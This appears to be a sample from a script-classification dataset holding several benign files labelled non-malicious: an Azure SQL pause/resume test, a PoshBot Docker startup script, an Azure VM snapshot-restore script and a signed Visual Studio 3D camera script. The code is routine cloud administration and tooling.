Assert-AreEqual $dwdb3.DatabaseName $databaseName
Assert-AreEqual $dwdb3.MaxSizeBytes $maxSizeBytes
Assert-AreEqual $dwdb3.Edition DataWarehouse
Assert-AreEqual $dwdb3.CurrentServiceObjectiveName DW100
Assert-AreEqual $dwdb3.CollationName $collationName
Assert-AreEqual $dwdb3.Status "Online"
}
finally
{
Remove-ResourceGroupForTest $rg
}
}
function Test-DatabasePauseResumePiped
{
$location = "westcentralus"
$serverVersion = "12.0";
$rg = Create-ResourceGroupForTest
try
{
$server = Create-ServerForTest $rg $location
$databaseName = Get-DatabaseName
$collationName = "SQL_Latin1_General_CP1_CI_AS"
$maxSizeBytes = 250GB
$dwdb = New-AzSqlDatabase -ResourceGroupName $rg.ResourceGroupName -ServerName $server.ServerName -DatabaseName $databaseName `
-CollationName $collationName -MaxSizeBytes $maxSizeBytes -Edition DataWarehouse -RequestedServiceObjectiveName DW100
$job = $dwdb | Suspend-AzSqlDatabase -AsJob
$job | Wait-Job
$dwdb2 = $job.Output
Assert-AreEqual $dwdb2.DatabaseName $databaseName
Assert-AreEqual $dwdb2.MaxSizeBytes $maxSizeBytes
Assert-AreEqual $dwdb2.Edition DataWarehouse
Assert-AreEqual $dwdb2.CurrentServiceObjectiveName DW100
Assert-AreEqual $dwdb2.CollationName $collationName
Assert-AreEqual $dwdb2.Status "Paused"
$dwdb3 = $dwdb2 | Resume-AzSqlDatabase
Assert-AreEqual $dwdb3.DatabaseName $databaseName
Assert-AreEqual $dwdb3.MaxSizeBytes $maxSizeBytes
Assert-AreEqual $dwdb3.Edition DataWarehouse
Assert-AreEqual $dwdb3.CurrentServiceObjectiveName DW100
Assert-AreEqual $dwdb3.CollationName $collationName
Assert-AreEqual $dwdb3.Status "Online"
}
finally
{
Remove-ResourceGroupForTest $rg
}
}
|
combined_dataset/train/non-malicious/3349.ps1
|
3349.ps1
|
[cmdletbinding()]
param()
$VerbosePreference = 'Continue'
function Get-FromEnv {
[cmdletbinding()]
param(
[parameter(Mandatory)]
$Name,
[parameter(Mandatory)]
$Default
)
$envValue = Get-ChildItem -Path Env: |
Where-Object { $_.Name.ToUpper() -eq $Name.ToUpper() } |
Select-Object -First 1 |
ForEach-Object {
$_.Value
}
if ($null -eq $envValue) {
Write-Verbose "$Name = $($Default)"
$Default
} else {
Write-Verbose "$Name = $envValue"
$envValue
}
}
if ($IsLinux -or $IsMacOs) {
$rootDrive = ''
} else {
$rootDrive = 'c:'
}
$configurationSettings = @{
Name = @{
EnvVariable = 'POSHBOT_NAME'
DefaultValue = 'PoshBot_Docker'
}
ConfigurationDirectory = @{
EnvVariable = 'POSHBOT_CONFIG_DIRECTORY'
DefaultValue = "$rootDrive/poshbot_data"
}
LogDirectory = @{
EnvVariable = 'POSHBOT_LOG_DIRECTORY'
DefaultValue = "$rootDrive/poshbot_data/logs"
}
PluginDirectory = @{
EnvVariable = 'POSHBOT_PLUGIN_DIRECTORY'
DefaultValue = "$rootDrive/poshbot_data/plugins"
}
PluginRepository = @{
EnvVariable = 'POSHBOT_PLUGIN_REPOSITORIES'
DefaultValue = @('PSGallery')
}
LogLevel = @{
EnvVariable = 'POSHBOT_LOG_LEVEL'
DefaultValue = 'Verbose'
}
MaxLogSizeMB = @{
EnvVariable = 'POSHBOT_MAX_LOG_SIZE_MB'
DefaultValue = 10
}
MaxLogsToKeep = @{
EnvVariable = 'POSHBOT_MAX_LOGS_TO_KEEP'
DefaultValue = 5
}
LogCommandHistory = @{
EnvVariable = 'POSHBOT_LOG_CMD_HISTORY'
DefaultValue = $true
}
CommandHistoryMaxLogSizeMB = @{
EnvVariable = 'POSHBOT_CMD_HISTORY_MAX_LOG_SIZE_MB'
DefaultValue = 10
}
CommandHistoryMaxLogsToKeep = @{
EnvVariable = 'POSHBOT_CMD_HISTORY_MAX_LOGS_TO_KEEP'
DefaultValue = 5
}
BackendConfiguration = @{
EnvVariable = 'POSHBOT_BACKEND_CONFIGURATION'
DefaultValue = @{}
}
PluginConfiguration = @{
EnvVariable = 'POSHBOT_PLUGIN_CONFIGURATION'
DefaultValue = @{}
}
BotAdmins = @{
EnvVariable = 'POSHBOT_ADMINS'
DefaultValue = @()
}
CommandPrefix = @{
EnvVariable = 'POSHBOT_CMD_PREFIX'
DefaultValue = '!'
}
AlternateCommandPrefixes = @{
EnvVariable = 'POSHBOT_ALT_CMD_PREFIXES'
DefaultValue = @('poshbot')
}
AlternateCommandPrefixSeperators = @{
EnvVariable = 'POSHBOT_ALT_CMD_PREFIX_SEP'
DefaultValue = @(':', ',', ';')
}
SendCommandResponseToPrivate = @{
EnvVariable = 'POSHBOT_SEND_CMD_RESP_TO_PRIV'
DefaultValue = @()
}
MuteUnknownCommand = @{
EnvVariable = 'POSHBOT_MUTE_UNKNOWN_CMD'
DefaultValue = $false
}
AddCommandReactions = @{
EnvVariable = 'POSHBOT_ADD_CMD_REACTIONS'
DefaultValue = $true
}
DisallowDMs = @{
EnvVariable = 'POSHBOT_DISALLOW_DMS'
DefaultValue = $false
}
FormatEnumerationLimitOverride = @{
EnvVariable = 'POSHBOT_FORMAT_ENUMERATION_LIMIT'
DefaultValue = -1
}
BackendType = @{
EnvVariable = 'POSHBOT_BACKEND'
DefaultValue = 'SlackBackend'
}
}
Import-Module -Name PoshBot -ErrorAction Stop -Verbose:$false
Write-Verbose 'Runtime settings:'
$runTimeSettings = @{}
$configurationSettings.GetEnumerator().ForEach({
$runTimeSettings.($_.Name) = Get-FromEnv -Name $_.Value.EnvVariable -Default $_.Value.DefaultValue
})
if ($env:POSHBOT_ALT_CMD_PREFIXES) { $runTimeSettings.AlternateCommandPrefixes = $runTimeSettings.AlternateCommandPrefixes -split ';' }
if ($env:POSHBOT_PLUGIN_REPOSITORIES) { $runTimeSettings.PluginRepository = $runTimeSettings.PluginRepository -split ';' }
if ($env:POSHBOT_ALT_CMD_PREFIX_SEP) { $runTimeSettings.AlternateCommandPrefixSeperators = ($runTimeSettings.AlternateCommandPrefixSeperators -split ';').ToCharArray }
$configPSD1 = Join-Path -Path $runTimeSettings.ConfigurationDirectory -ChildPath 'PoshBot.psd1'
if (-not (Test-Path -Path $configPSD1)) {
$configParams = @{
Name = $runtimeSettings.Name
ConfigurationDirectory = $runtimeSettings.ConfigurationDirectory
LogDirectory = $runtimeSettings.LogDirectory
PluginDirectory = $runtimeSettings.PluginDirectory
PluginRepository = $runtimeSettings.PluginRepository
LogLevel = $runtimeSettings.LogLevel
MaxLogSizeMB = $runtimeSettings.MaxLogSizeMB
MaxLogsToKeep = $runtimeSettings.MaxLogsToKeep
LogCommandHistory = $runtimeSettings.LogCommandHistory
CommandHistoryMaxLogSizeMB = $runtimeSettings.CommandHistoryMaxLogSizeMB
CommandHistoryMaxLogsToKeep = $runtimeSettings.CommandHistoryMaxLogsToKeep
BotAdmins = $runtimeSettings.BotAdmins
CommandPrefix = $runtimeSettings.CommandPrefix
AlternateCommandPrefixes = $runtimeSettings.AlternateCommandPrefixes
AlternateCommandPrefixSeperators = $runtimeSettings.AlternateCommandPrefixSeperators
MuteUnknownCommand = $runTimeSettings.MuteUnknownCommand
}
switch ($runTimeSettings.BackendType) {
{$_ -in 'Slack', 'SlackBackend'} {
$slackToken = Get-FromEnv -Name 'POSHBOT_SLACK_TOKEN' -Default ''
if ([string]::IsNullOrEmpty($slackToken) -or $runtimeSettings.BotAdmins.Count -eq 0) {
throw 'POSHBOT_SLACK_TOKEN and POSHBOT_ADMINS environment variables are required if there is not a preexisting bot configuration to load. Please specify your Slack token and initial list of bot administrators.'
exit 1
}
$configParams.BackendConfiguration = @{
Token = $slackToken
Name = 'SlackBackend'
}
}
{$_ -in 'Teams', 'TeamsBackend'} {
$botName = Get-FromEnv -Name 'POSHBOT_TEAMS_BOT_NAME' -Default ''
$teamsId = Get-FromEnv -Name 'POSHBOT_TEAMS_ID' -Default ''
$serviceBusNamespace = Get-FromEnv -Name 'POSHBOT_TEAMS_SERVICEBUS_NAMESPACE' -Default ''
$serviceBusQueueName = Get-FromEnv -Name 'POSHBOT_TEAMS_SERVICEBUS_QUEUE_NAME' -Default ''
$serviceBusAccessKeyName = Get-FromEnv -Name 'POSHBOT_TEAMS_SERVICEBUS_ACCESS_KEY_NAME' -Default ''
$serviceBusAccessKey = Get-FromEnv -Name 'POSHBOT_TEAMS_SERVICEBUS_ACCESS_KEY' -Default ''
$botFrameworkId = Get-FromEnv -Name 'POSHBOT_BOT_FRAMEWORK_ID' -Default ''
$botFrameworkPassword = Get-FromEnv -Name 'POSHBOT_BOT_FRAMEWORK_PASSWORD' -Default ''
if ($runtimeSettings.BotAdmins.Count -eq 0 -or
[string]::IsNullOrEmpty($botName) -or
[string]::IsNullOrEmpty($teamsId) -or
[string]::IsNullOrEmpty($serviceBusNamespace) -or
[string]::IsNullOrEmpty($serviceBusQueueName) -or
[string]::IsNullOrEmpty($serviceBusAccessKeyName) -or
[string]::IsNullOrEmpty($serviceBusAccessKey) -or
[string]::IsNullOrEmpty($botFrameworkId) -or
[string]::IsNullOrEmpty($botFrameworkPassword)) {
throw 'POSHBOT_SLACK_TOKEN and POSHBOT_ADMINS environment variables are required if there is not a preexisting bot configuration to load. Please specify your Slack token and initial list of bot administrators.'
exit 1
}
$configParams.BackendConfiguration = @{
Name = 'TeamsBackend'
BotName = $botName
TeamId = $teamsId
ServiceBusNamespace = $serviceBusNamespace
QueueName = $serviceBusQueueName
AccessKeyName = $serviceBusAccessKeyName
AccessKey = $serviceBusAccessKey | ConvertTo-SecureString -AsPlainText -Force
Credential = [pscredential]::new(
$botFrameworkId,
($botFrameworkPassword | ConvertTo-SecureString -AsPlainText -Force)
)
}
}
{$_ -in 'Discord', 'DiscordBackend'} {
$token = Get-FromEnv -Name 'POSHBOT_DISCORD_TOKEN' -Default ''
$clientId = Get-FromEnv -Name 'POSHBOT_DISCORD_CLIENT_ID' -Default ''
$guildId = Get-FromEnv -Name 'POSHBOT_DISCORD_GUILD_ID' -Default ''
if ($runtimeSettings.BotAdmins.Count -eq 0 -or
[string]::IsNullOrEmpty($token) -or
[string]::IsNullOrEmpty($clientId) -or
[string]::IsNullOrEmpty($guildId)) {
throw 'POSHBOT_DISCORD_TOKEN, POSHBOT_DISCORD_CLIENT_ID, POSHBOT_DISCORD_GUILD_ID, and POSHBOT_ADMINS environment variables are required if there is not a preexisting bot configuration to load. Please specify the required backend configuration and initial list of bot administrators.'
exit 1
}
$configParams.BackendConfiguration = @{
Name = 'DiscordBackend'
Token = $token
ClientId = $clientId
GuildId = $guildId
}
}
}
$pbc = New-PoshBotConfiguration @configParams
} else {
$pbc = Get-PoshBotConfiguration -Path $configPSD1
$pbc.Name = Get-FromEnv -Name 'POSHBOT_NAME' -Default $pbc.Name
$pbc.ConfigurationDirectory = Get-FromEnv -Name 'POSHBOT_CONFIG_DIRECTORY' -Default $pbc.ConfigurationDirectory
$pbc.CommandPrefix = Get-FromEnv -Name 'POSHBOT_CMD_PREFIX' -Default $pbc.CommandPrefix
$pbc.PluginRepository = Get-FromEnv -Name 'POSHBOT_PLUGIN_REPOSITORIES' -Default $pbc.PluginRepository
$pbc.LogDirectory = Get-FromEnv -Name 'POSHBOT_LOG_DIR' -Default $pbc.LogDirectory
$pbc.BotAdmins = Get-FromEnv -Name 'POSHBOT_ADMINS' -Default $pbc.BotAdmins
$pbc.LogLevel = Get-FromEnv -Name 'POSHBOT_LOG_LEVEL' -Default $pbc.LogLevel
$pbc.AlternateCommandPrefixes = Get-FromEnv -Name 'POSHBOT_ALT_CMD_PREFIXES' -Default $pbc.AlternateCommandPrefixes
$pbc.PluginDirectory = Get-FromEnv -Name 'POSHBOT_PLUGIN_DIR' -Default $pbc.PluginDirectory
$pbc.MuteUnknownCommand = Get-FromEnv -Name 'POSHBOT_MUTE_UNKNOWN_CMD' -Default $pbc.MuteUnknownCommand
$pbc.AlternateCommandPrefixSeperators = Get-FromEnv -Name 'POSHBOT_ALT_CMD_PREFIX_SEP' -Default $pbc.AlternateCommandPrefixSeperators
$pbc.SendCommandResponseToPrivate = Get-FromEnv -Name 'POSHBOT_SEND_CMD_RESP_TO_PRIV' -Default $pbc.SendCommandResponseToPrivate
$slackToken = Get-FromEnv -Name 'POSHBOT_SLACK_TOKEN' -Default ''
if (-not [string]::IsNullOrEmpty($slackToken)) {
$pbc.BackendConfiguration = @{
Token = $slackToken
Name = 'SlackBackend'
}
}
}
switch ($runTimeSettings.BackendType) {
{$_ -in @('Slack', 'SlackBackend')} {
$backEndCommand = Get-Command New-PoshBotSlackBackend
}
{$_ -in @('Teams', 'TeamsBackend')} {
$backendCommand = Get-Command New-PoshBotTeamsBackend
}
{$_ -in @('Discord', 'DiscordBackend')} {
$backEndCommand = Get-Command New-PoshBotDiscordBackend
}
default {
throw "Unable to determine backend type. Name property in BackendConfiguration should be one of the following: 'Slack', 'SlackBackend', 'Teams', 'TeamsBackend', 'Discord', 'DiscordBackend'"
exit 1
}
}
$backend = & $backendCommand -Configuration $pbc.BackendConfiguration
$bot = New-PoshBotInstance -Configuration $pbc -Backend $backend
$bot.Start()
|
combined_dataset/train/non-malicious/2480.ps1
|
2480.ps1
|
[CmdletBinding()]
param (
[Parameter(Mandatory,
ValueFromPipeline)]
[string[]]$AzureVM,
[string]$ServiceName = 'ADBCLOUD',
[string]$VmExportConfigFolderPath = 'C:\ExportedVMs'
)
begin {
Set-StrictMode -Version Latest
try {
$AzureModuleFilePath = "$($env:ProgramFiles)\Microsoft SDKs\Windows Azure\PowerShell\ServiceManagement\Azure\Azure.psd1"
if (!(Test-Path $AzureModuleFilePath)) {
Write-Error 'Azure module not found'
} else {
Import-Module $AzureModuleFilePath
}
$script:BackupContainer = 'backups'
if (!(Test-Path $VmExportConfigFolderPath -PathType Container)) {
New-Item -Path $VmExportConfigFolderPath -ItemType Directory | Out-Null
}
function Restore-Snapshot([Microsoft.WindowsAzure.Commands.ServiceManagement.Model.PersistentVMModel.OSVirtualHardDisk]$Disk) {
$DiskName = $Disk.DiskName
$DiskUris = $Disk.MediaLink
$StorageAccount = $DiskUris.Host.Split('.')[0]
$Blob = $Disk.MediaLink.Segments[-1]
$Container = $Disk.MediaLink.Segments[-2].TrimEnd('/')
While ((Get-AzureDisk -DiskName $DiskName).AttachedTo) {
Write-Verbose "Waiting for $DiskName to detach..."
Start-Sleep 5
}
Remove-AzureDisk -DiskName $DiskName -DeleteVHD
$BlobCopyParams = @{
'SrcContainer' = $BackupContainer;
'SrcBlob' = $Blob;
'DestContainer' = $Container;
'Force' = $true
}
Start-AzureStorageBlobCopy @BlobCopyParams
Get-AzureStorageBlobCopyState -Container $Container -Blob $Blob -WaitForComplete
Add-AzureDisk -DiskName $DiskName -MediaLocation $DiskUris.AbsoluteUri -OS 'Windows'
}
} catch {
Write-Error $_.Exception.Message
exit
}
}
process {
try {
foreach ($Vm in $AzureVM) {
$Vm = Get-AzureVM -ServiceName $ServiceName -Name $Vm
if ($Vm.Status -ne 'StoppedVM') {
if ($Vm.Status -eq 'ReadyRole') {
Write-Verbose "VM $($Vm.Name) is started. Bringing down into a provisioned state"
$Vm | Stop-AzureVm -StayProvisioned
} elseif ($Vm.Status -eq 'StoppedDeallocated') {
Write-Verbose "VM $($Vm.Name) is stopped but not in a provisioned state."
Write-Verbose "Starting up VM $($Vm.Name)..."
$Vm | Start-AzureVm
while ((Get-AzureVm -ServiceName $ServiceName -Name $Vm.Name).Status -ne 'ReadyRole') {
sleep 5
Write-Verbose "Waiting on VM $($Vm.Name) to be in a ReadyRole state..."
}
Write-Verbose "VM $($Vm.Name) now up. Bringing down into a provisioned state..."
$Vm | Stop-AzureVm -StayProvisioned
}
}
$OsDisk = $Vm | Get-AzureOSDisk
$VmExportPath = "$VmExportConfigFolderPath\$($Vm.Name).xml"
$Vm | Export-AzureVM -Path $VmExportPath
Remove-AzureVM -ServiceName $Vm.ServiceName -Name $Vm.Name
Restore-Snapshot -Disk $OsDisk
$DataDisks = $Vm | Get-AzureDataDisk
if ($DataDisks) {
Write-Verbose "Data disks found on VM. Restoring..."
foreach ($DataDisk in $DataDisks) {
Restore-Snapshot -Disk $DataDisk
}
}
Import-AzureVM -Path $VmExportPath | New-AzureVM -ServiceName $Vm.ServiceName
While ((Get-AzureVM -Name $Vm.Name).Status -ne 'ReadyRole') {
Write-Verbose "Waiting for $($Vm.Name) to become available again..."
Start-Sleep 5
}
}
} catch {
Write-Error $_.Exception.Message
exit
}
}
end {
try {
} catch {
Write-Error $_.Exception.Message
}
}
|
combined_dataset/train/non-malicious/sample_32_44.ps1
|
sample_32_44.ps1
|
function getWorldMatrix(element) {
return element.getTrait("WorldTransform").value;
}
var isOrtho = false;
function getCameraElement() {
var camera = document.elements.findElementByTypeId("Microsoft.VisualStudio.3D.PerspectiveCamera");
if (camera == null) {
isOrtho = true;
camera = document.elements.findElementByTypeId("Microsoft.VisualStudio.3D.OrthographicCamera");
}
return camera;
}
var cameraElement = getCameraElement();
var camWorldMatrix = getWorldMatrix(cameraElement);
if (isOrtho) {
var coord = document.getCoordinateSystemMatrix();
var relPos = math.getForwardVector(coord);
relPos = math.transformNormal(camWorldMatrix, relPos);
document.frameSelection(relPos[0], relPos[1], relPos[2], true);
}
else {
var camPos = math.getTranslation(camWorldMatrix);
document.frameSelection(camPos[0], camPos[1], camPos[2], false);
}
// SIG // Begin signature block
// SIG // MIIoOgYJKoZIhvcNAQcCoIIoKzCCKCcCAQExDzANBglg
// SIG // hkgBZQMEAgEFADB3BgorBgEEAYI3AgEEoGkwZzAyBgor
// SIG // BgEEAYI3AgEeMCQCAQEEEBDgyQbOONQRoqMAEEvTUJAC
// SIG // AQACAQACAQACAQACAQAwMTANBglghkgBZQMEAgEFAAQg
// SIG // tY1kP1jJfBkVCE+UU5duMnBiCJ7NzUGb40V66W1V3Kyg
// SIG // gg2FMIIGAzCCA+ugAwIBAgITMwAAA64tNVHIU49VHQAA
// SIG // AAADrjANBgkqhkiG9w0BAQsFADB+MQswCQYDVQQGEwJV
// SIG // UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH
// SIG // UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBv
// SIG // cmF0aW9uMSgwJgYDVQQDEx9NaWNyb3NvZnQgQ29kZSBT
// SIG // aWduaW5nIFBDQSAyMDExMB4XDTIzMTExNjE5MDg1OVoX
// SIG // DTI0MTExNDE5MDg1OVowdDELMAkGA1UEBhMCVVMxEzAR
// SIG // BgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1v
// SIG // bmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv
// SIG // bjEeMBwGA1UEAxMVTWljcm9zb2Z0IENvcnBvcmF0aW9u
// SIG // MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA
// SIG // 9CD8pjY3wxCoPmMhOkow7ycCltfqYnqk4wGNApzh2dTY
// SIG // +YqxozWTzJUOB38VxsgFQmXBFhOMdrGYGpvO9kdbNPkw
// SIG // HpTrW6hZqFuLLiRwGKEx4ZM5zVSqbHJuX2fPfUJ0Xmb+
// SIG // VrVsGw/BwBV2zz0rVtiSgqj3GeeGOsG7llfWyrSjyJqm
// SIG // 5DHE3o04BAI/NuhkHOv04euiqJGvHFCL8+fXvyD9OAxq
// SIG // 4fcJKtoyBb0PBA3oMNQeCsiUyLO+voZqVTOUsAWY0bN5
// SIG // YjkK4nq5DVaNdVrrowd5AX9gmz6D/TJTssns6pDCG00Y
// SIG // +Dh3ipWpnVmkhYcByyUSEKX3PLC8DkiAQQIDAQABo4IB
// SIG // gjCCAX4wHwYDVR0lBBgwFgYKKwYBBAGCN0wIAQYIKwYB
// SIG // BQUHAwMwHQYDVR0OBBYEFIcf73Spl4cHOFoll27H9COd
// SIG // 4fE/MFQGA1UdEQRNMEukSTBHMS0wKwYDVQQLEyRNaWNy
// SIG // b3NvZnQgSXJlbGFuZCBPcGVyYXRpb25zIExpbWl0ZWQx
// SIG // FjAUBgNVBAUTDTIzMDAxMis1MDE4MzYwHwYDVR0jBBgw
// SIG // FoAUSG5k5VAF04KqFzc3IrVtqMp1ApUwVAYDVR0fBE0w
// SIG // SzBJoEegRYZDaHR0cDovL3d3dy5taWNyb3NvZnQuY29t
// SIG // L3BraW9wcy9jcmwvTWljQ29kU2lnUENBMjAxMV8yMDEx
// SIG // LTA3LTA4LmNybDBhBggrBgEFBQcBAQRVMFMwUQYIKwYB
// SIG // BQUHMAKGRWh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9w
// SIG // a2lvcHMvY2VydHMvTWljQ29kU2lnUENBMjAxMV8yMDEx
// SIG // LTA3LTA4LmNydDAMBgNVHRMBAf8EAjAAMA0GCSqGSIb3
// SIG // DQEBCwUAA4ICAQBqyWA1Eu7PKNMjaaxl0V7gJ0XBysUo
// SIG // xZluMHJXFE2LEGZIZ2zMLYVjOnAGG/4dluRjSrZZo/8v
// SIG // wk4Xt8v6NBB9ofo8H1P/XidHytWTv9lg9MYu++6lPmu5
// SIG // fCozD3cI2NLZPW2BBhGX2D0R8tQBj0FbmZRuIucpiQ7D
// SIG // K3CHKlfKcc7MP8pPzuMv55Tox8+KFQD1NG6+bfbYA/BN
// SIG // PBkg4tyOh+exbaHfcNuodDJUIjq9dF6oa+Yjy0u0pUMI
// SIG // /B1t+8m6rJo0KSoZlrpesYl0jRhpt+hmqx8uENXoGJcY
// SIG // ZVJ5N2Skq90LViKNRhi9N4U+e8c4y9uXyomUF/6viCPJ
// SIG // 7huTNEJo75ehIJba+IWd3txUEc0R3y6DT6txC6cW1nR/
// SIG // LTbo9I/8fQq538G5IvJ+e5iSiOSVVkVk0i5m03Awy5E2
// SIG // ZSS4PVdQSCcFxmN4tpEfYuR7AAy/GJVtIDFlUpSgdXok
// SIG // pSui5hYtK1R9enXXvo+U/xGkLRc+qp4De3dZbzu7pOq7
// SIG // V/jCyhuCw0bEIAU4urCGIip7TI6GBRzD7yPzjFIqeZY7
// SIG // S4rVW5BRn2oEqpm8Su6yTIQvMIk8x2pwYNUa2339Z4gW
// SIG // 5xW21eFA5mLpo7NRSKRQms5OgAA18aCgqOU7Ds0h6q/Y
// SIG // B4BmEAtoTMl/TBiyKaMGAlEcdy+5FIhmzojMGjCCB3ow
// SIG // ggVioAMCAQICCmEOkNIAAAAAAAMwDQYJKoZIhvcNAQEL
// SIG // BQAwgYgxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNo
// SIG // aW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQK
// SIG // ExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xMjAwBgNVBAMT
// SIG // KU1pY3Jvc29mdCBSb290IENlcnRpZmljYXRlIEF1dGhv
// SIG // cml0eSAyMDExMB4XDTExMDcwODIwNTkwOVoXDTI2MDcw
// SIG // ODIxMDkwOVowfjELMAkGA1UEBhMCVVMxEzARBgNVBAgT
// SIG // Cldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAc
// SIG // BgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEoMCYG
// SIG // A1UEAxMfTWljcm9zb2Z0IENvZGUgU2lnbmluZyBQQ0Eg
// SIG // MjAxMTCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoC
// SIG // ggIBAKvw+nIQHC6t2G6qghBNNLrytlghn0IbKmvpWlCq
// SIG // uAY4GgRJun/DDB7dN2vGEtgL8DjCmQawyDnVARQxQtOJ
// SIG // DXlkh36UYCRsr55JnOloXtLfm1OyCizDr9mpK656Ca/X
// SIG // llnKYBoF6WZ26DJSJhIv56sIUM+zRLdd2MQuA3WraPPL
// SIG // bfM6XKEW9Ea64DhkrG5kNXimoGMPLdNAk/jj3gcN1Vx5
// SIG // pUkp5w2+oBN3vpQ97/vjK1oQH01WKKJ6cuASOrdJXtjt
// SIG // 7UORg9l7snuGG9k+sYxd6IlPhBryoS9Z5JA7La4zWMW3
// SIG // Pv4y07MDPbGyr5I4ftKdgCz1TlaRITUlwzluZH9TupwP
// SIG // rRkjhMv0ugOGjfdf8NBSv4yUh7zAIXQlXxgotswnKDgl
// SIG // mDlKNs98sZKuHCOnqWbsYR9q4ShJnV+I4iVd0yFLPlLE
// SIG // tVc/JAPw0XpbL9Uj43BdD1FGd7P4AOG8rAKCX9vAFbO9
// SIG // G9RVS+c5oQ/pI0m8GLhEfEXkwcNyeuBy5yTfv0aZxe/C
// SIG // HFfbg43sTUkwp6uO3+xbn6/83bBm4sGXgXvt1u1L50kp
// SIG // pxMopqd9Z4DmimJ4X7IvhNdXnFy/dygo8e1twyiPLI9A
// SIG // N0/B4YVEicQJTMXUpUMvdJX3bvh4IFgsE11glZo+TzOE
// SIG // 2rCIF96eTvSWsLxGoGyY0uDWiIwLAgMBAAGjggHtMIIB
// SIG // 6TAQBgkrBgEEAYI3FQEEAwIBADAdBgNVHQ4EFgQUSG5k
// SIG // 5VAF04KqFzc3IrVtqMp1ApUwGQYJKwYBBAGCNxQCBAwe
// SIG // CgBTAHUAYgBDAEEwCwYDVR0PBAQDAgGGMA8GA1UdEwEB
// SIG // /wQFMAMBAf8wHwYDVR0jBBgwFoAUci06AjGQQ7kUBU7h
// SIG // 6qfHMdEjiTQwWgYDVR0fBFMwUTBPoE2gS4ZJaHR0cDov
// SIG // L2NybC5taWNyb3NvZnQuY29tL3BraS9jcmwvcHJvZHVj
// SIG // dHMvTWljUm9vQ2VyQXV0MjAxMV8yMDExXzAzXzIyLmNy
// SIG // bDBeBggrBgEFBQcBAQRSMFAwTgYIKwYBBQUHMAKGQmh0
// SIG // dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2kvY2VydHMv
// SIG // TWljUm9vQ2VyQXV0MjAxMV8yMDExXzAzXzIyLmNydDCB
// SIG // nwYDVR0gBIGXMIGUMIGRBgkrBgEEAYI3LgMwgYMwPwYI
// SIG // KwYBBQUHAgEWM2h0dHA6Ly93d3cubWljcm9zb2Z0LmNv
// SIG // bS9wa2lvcHMvZG9jcy9wcmltYXJ5Y3BzLmh0bTBABggr
// SIG // BgEFBQcCAjA0HjIgHQBMAGUAZwBhAGwAXwBwAG8AbABp
// SIG // AGMAeQBfAHMAdABhAHQAZQBtAGUAbgB0AC4gHTANBgkq
// SIG // hkiG9w0BAQsFAAOCAgEAZ/KGpZjgVHkaLtPYdGcimwuW
// SIG // EeFjkplCln3SeQyQwWVfLiw++MNy0W2D/r4/6ArKO79H
// SIG // qaPzadtjvyI1pZddZYSQfYtGUFXYDJJ80hpLHPM8QotS
// SIG // 0LD9a+M+By4pm+Y9G6XUtR13lDni6WTJRD14eiPzE32m
// SIG // kHSDjfTLJgJGKsKKELukqQUMm+1o+mgulaAqPyprWElj
// SIG // HwlpblqYluSD9MCP80Yr3vw70L01724lruWvJ+3Q3fMO
// SIG // r5kol5hNDj0L8giJ1h/DMhji8MUtzluetEk5CsYKwsat
// SIG // ruWy2dsViFFFWDgycScaf7H0J/jeLDogaZiyWYlobm+n
// SIG // t3TDQAUGpgEqKD6CPxNNZgvAs0314Y9/HG8VfUWnduVA
// SIG // KmWjw11SYobDHWM2l4bf2vP48hahmifhzaWX0O5dY0Hj
// SIG // Wwechz4GdwbRBrF1HxS+YWG18NzGGwS+30HHDiju3mUv
// SIG // 7Jf2oVyW2ADWoUa9WfOXpQlLSBCZgB/QACnFsZulP0V3
// SIG // HjXG0qKin3p6IvpIlR+r+0cjgPWe+L9rt0uX4ut1eBrs
// SIG // 6jeZeRhL/9azI2h15q/6/IvrC4DqaTuv/DDtBEyO3991
// SIG // bWORPdGdVk5Pv4BXIqF4ETIheu9BCrE/+6jMpF3BoYib
// SIG // V3FWTkhFwELJm3ZbCoBIa/15n8G9bW1qyVJzEw16UM0x
// SIG // ghoNMIIaCQIBATCBlTB+MQswCQYDVQQGEwJVUzETMBEG
// SIG // A1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u
// SIG // ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9u
// SIG // MSgwJgYDVQQDEx9NaWNyb3NvZnQgQ29kZSBTaWduaW5n
// SIG // IFBDQSAyMDExAhMzAAADri01UchTj1UdAAAAAAOuMA0G
// SIG // CWCGSAFlAwQCAQUAoIGuMBkGCSqGSIb3DQEJAzEMBgor
// SIG // BgEEAYI3AgEEMBwGCisGAQQBgjcCAQsxDjAMBgorBgEE
// SIG // AYI3AgEVMC8GCSqGSIb3DQEJBDEiBCDo8+YsFQgG+h1s
// SIG // 5KLMCG3WaOzzNKEz/nCy7VFsqL1NiTBCBgorBgEEAYI3
// SIG // AgEMMTQwMqAUgBIATQBpAGMAcgBvAHMAbwBmAHShGoAY
// SIG // aHR0cDovL3d3dy5taWNyb3NvZnQuY29tMA0GCSqGSIb3
// SIG // DQEBAQUABIIBAJBuVqzvn5YmyQ+TjSIozkNL5tGY1mDo
// SIG // BMokTozqUMrquAyWZC2FrVdvYVyR5B/bgUGN66XVOr+i
// SIG // 9+dGHpA0JqGZEECHht84OixOadUqUGzHA2SVzGx4EAxZ
// SIG // CcO/nBAYR+drVsMiR+XAHJ+SKAZllzYzxwxdjjK3Azv4
// SIG // XS5rOGHYwxr4QBuo6tRxhsDlSv81RpTTGA4sM3CJenXm
// SIG // cLi/+JsZ+M/L7RygaUCjpKLjGRrlT9s08L7T/dRweK+q
// SIG // FTesgu/j307ZPkoNNY2cViNmhsBWeUbHztx6lwbQEVl9
// SIG // wKmOWzbSBq7DpdIuKxnnp9xAHZg/S2+RLQNkWLYRFp5l
